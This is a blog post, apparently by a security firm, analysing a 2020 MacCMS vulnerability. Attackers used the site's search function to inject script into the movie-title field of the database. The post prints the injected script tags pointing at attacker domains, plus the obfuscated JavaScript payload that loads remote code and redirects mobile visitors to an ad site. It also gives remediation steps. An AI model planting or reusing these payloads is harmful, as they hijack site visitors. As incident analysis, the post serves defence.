蘋果CMS d_name值漏洞EXP掛馬解決辦法
蘋果CMS漏洞是越來越多了,國內很多電影網站都使用的是maccms V10 V8版本,就在2020年初該maccms漏洞爆發了,目前極少數的攻擊者掌握了該EXP POC,受該BUG的影響,百分之80的電影站都被攻擊了,很多電影站的站長找到我們SINE安全來解決網站被掛馬的問題,通過分析我們發現大部分客戶網站在資料庫中都被插入了掛馬程式碼,<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>,尤其電影片名d_name值被直接篡改,並且是批量掛馬,導致使用者開啟網站訪問直接彈窗廣告並跳轉。
JS掛馬程式碼如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3
5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e
(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)
if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2"
7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script
|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent
"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphon
e|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout(
'window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}
上面惡意程式碼對訪問使用者進行了判斷,如果是手機端的,IOS,安卓,以及平板都會跳轉到攻擊者設定好的廣告網頁當中去,https://m.zhuanjiyin.net:168/index.html?u=80666就是跳轉到這裡,根據我們SINE安全技術的分析與統計,大部分被攻擊的網站跳轉都是168埠的網址上,域名經常變換,但是168埠沒有變,可以看出是同一個攻擊者所為。
電影網站被掛馬的特徵就是以上這些情況,根據客戶的反饋以及提供伺服器IP,root賬號密碼後,我們進去對蘋果cms的原始碼進行了全面的人工安全審計,在網站的根目錄下生成了webshell網站木馬後門檔案,在快取目錄中也發現了同樣的網站木馬,繼續溯源追蹤,檢視nginx網站日誌,發現用的是同樣的手段,我們SINE安全技術再熟悉不過了,通過post index.php搜尋功能進行插入資料庫並嵌入掛馬程式碼,漏洞產生的原因是電影搜尋裡可以插入惡意程式碼,攻擊者將惡意程式碼加密後,不管你伺服器用雲鎖,還是寶塔,安全狗,都是攔截不了的,還是會被篡改。
我們SINE安全技術隨即對客戶的蘋果CMS漏洞進行了修復,對POST過來的資料進行了嚴格的安全過濾與檢測,對攻擊者加密的程式碼也進行了特徵定位攔截。只要包含了該惡意內容,直接攔截並返回錯誤提示。對網站根目錄下存在的webshell也進行了刪除。對客戶網站的快取目錄,以及圖片目錄,JS目錄都做了安全部署與加固,防止php指令碼檔案在網站的執行,對網站的管理員後臺進行了許可權分離,更新採集,與網站前端訪問使用2個資料庫賬號,1個只讀許可權的資料庫賬號,1個後臺採集可寫的資料庫賬號,這在安全層面上來說,網站安全等級更高了,一般攻擊者無法攻擊與篡改。我們即修復了漏洞,也做了安全攔截與多層次的安全加固部署,至此客戶網站資料庫被掛馬的問題得以解決。
有很多客戶的電影網站都到maccms官方進行了更新與補丁下載,但安裝後還是會繼續被掛馬,這裡跟大家說一下,目前官方的漏洞補丁對此次資料庫掛馬漏洞是沒有任何效果的。如果不知道如何對蘋果cms漏洞進行修復以及打補丁,建議找專業的 網站安全公司來處理,對index.php搜尋功能這裡做安全過濾與攔截,對加密的特徵碼進行解密定位,更新到攔截黑名單中,即可修復該蘋果CMS漏洞。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2671892/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- EXP-00091解決辦法
- 資料庫漏洞解決辦法資料庫
- Kindeditor 漏洞導致網站被植入木馬檔案的解決辦法網站
- 開啟網站被掛馬跳轉到博彩頁面解決辦法網站
- apache網站漏洞修復解決辦法Apache網站
- Jenkins解決無法獲取外掛的辦法Jenkins
- Chrome被快播外掛劫持&解決辦法Chrome
- Windows環境下EXP-00091錯誤的解決辦法Windows
- 放假期間網站被掛馬的解決辦法網站
- 網站被掛馬,非管理員訪問自動跳轉到廣告頁面解決辦法網站
- IFrame安全問題解決辦法(跨框架指令碼(XFS)漏洞)框架指令碼
- 漏洞掛馬網站趨勢分析網站
- SQLServer資料庫恢復掛起的解決辦法SQLServer資料庫
- mac蘋果電腦忘記密碼的解決辦法Mac蘋果密碼
- 網站上傳漏洞掃描與檢測 以及webshell解決辦法網站Webshell
- 蘋果iPhoneSE忘記Apple ID密碼解決辦法蘋果iPhoneAPP密碼
- Linux系統下無法解除安裝掛載的解決辦法Linux
- github慢解決辦法Github
- Grub Rescue解決辦法
- /dev/null解決辦法devNull
- MSBuild Tools解決辦法UI
- 2020蘋果maccms最新漏洞補丁 防止資料庫被反覆掛馬蘋果Mac資料庫
- 資料庫升級後匯出報EXP-00056錯誤解決辦法資料庫
- wordpress 外掛 (主題)線上安裝失敗 解決辦法探索
- swiper外掛 縱向內容超出一屏解決辦法
- sqlserver、oracle資料庫排序空值null問題解決辦法SQLServerOracle資料庫排序Null
- iOS: addObjectsFromArray 新增資料一值為空的解決辦法iOSObject
- 檔案無法粉碎解決辦法
- OpenStack 的NAT解決辦法
- android ExceptionInInitializerError解決辦法AndroidExceptionError
- Could not find *.apk!解決辦法APK
- man出錯解決辦法
- ARP病毒解決辦法
- 4種辦法解決:蘋果手機跟iPad怎麼同步照片蘋果iPad
- ORA-01461: 僅可以為插入 LONG 列的 LONG 值賦值”解決辦法賦值
- 蘋果CMS漏洞 V10版本存在原始碼後門webshell POC蘋果原始碼Webshell
- 網站漏洞修復對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法網站PHP